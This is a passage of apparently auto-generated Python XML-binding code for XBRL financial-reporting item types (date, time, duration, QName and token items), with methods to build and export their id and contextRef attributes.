outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='QNameItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='QNameItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class QNameItemType
class durationItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if durationItemType.subclass:
return durationItemType.subclass(*args_, **kwargs_)
else:
return durationItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='durationItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='durationItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='durationItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='durationItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='durationItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class durationItemType
class dateTimeItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if dateTimeItemType.subclass:
return dateTimeItemType.subclass(*args_, **kwargs_)
else:
return dateTimeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='dateTimeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='dateTimeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='dateTimeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='dateTimeItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='dateTimeItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class dateTimeItemType
class timeItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if timeItemType.subclass:
return timeItemType.subclass(*args_, **kwargs_)
else:
return timeItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='timeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='timeItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='timeItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='timeItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='timeItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class timeItemType
class dateItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if dateItemType.subclass:
return dateItemType.subclass(*args_, **kwargs_)
else:
return dateItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='dateItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='dateItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='dateItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='dateItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='dateItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class dateItemType
class gYearMonthItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if gYearMonthItemType.subclass:
return gYearMonthItemType.subclass(*args_, **kwargs_)
else:
return gYearMonthItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='gYearMonthItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='gYearMonthItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='gYearMonthItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='gYearMonthItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='gYearMonthItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class gYearMonthItemType
class gYearItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if gYearItemType.subclass:
return gYearItemType.subclass(*args_, **kwargs_)
else:
return gYearItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='gYearItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='gYearItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='gYearItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='gYearItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='gYearItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class gYearItemType
class gMonthDayItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if gMonthDayItemType.subclass:
return gMonthDayItemType.subclass(*args_, **kwargs_)
else:
return gMonthDayItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='gMonthDayItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='gMonthDayItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='gMonthDayItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='gMonthDayItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='gMonthDayItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class gMonthDayItemType
class gDayItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if gDayItemType.subclass:
return gDayItemType.subclass(*args_, **kwargs_)
else:
return gDayItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='gDayItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='gDayItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='gDayItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='gDayItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='gDayItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class gDayItemType
class gMonthItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if gMonthItemType.subclass:
return gMonthItemType.subclass(*args_, **kwargs_)
else:
return gMonthItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='gMonthItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='gMonthItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='gMonthItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='gMonthItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='gMonthItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class gMonthItemType
class normalizedStringItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if normalizedStringItemType.subclass:
return normalizedStringItemType.subclass(*args_, **kwargs_)
else:
return normalizedStringItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='normalizedStringItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='normalizedStringItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='normalizedStringItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='normalizedStringItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='normalizedStringItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class normalizedStringItemType
class tokenItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None, extensiontype_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if tokenItemType.subclass:
return tokenItemType.subclass(*args_, **kwargs_)
else:
return tokenItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='tokenItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tokenItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='tokenItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='tokenItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespace_='finassist:', name_='tokenItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('xsi:type', node)
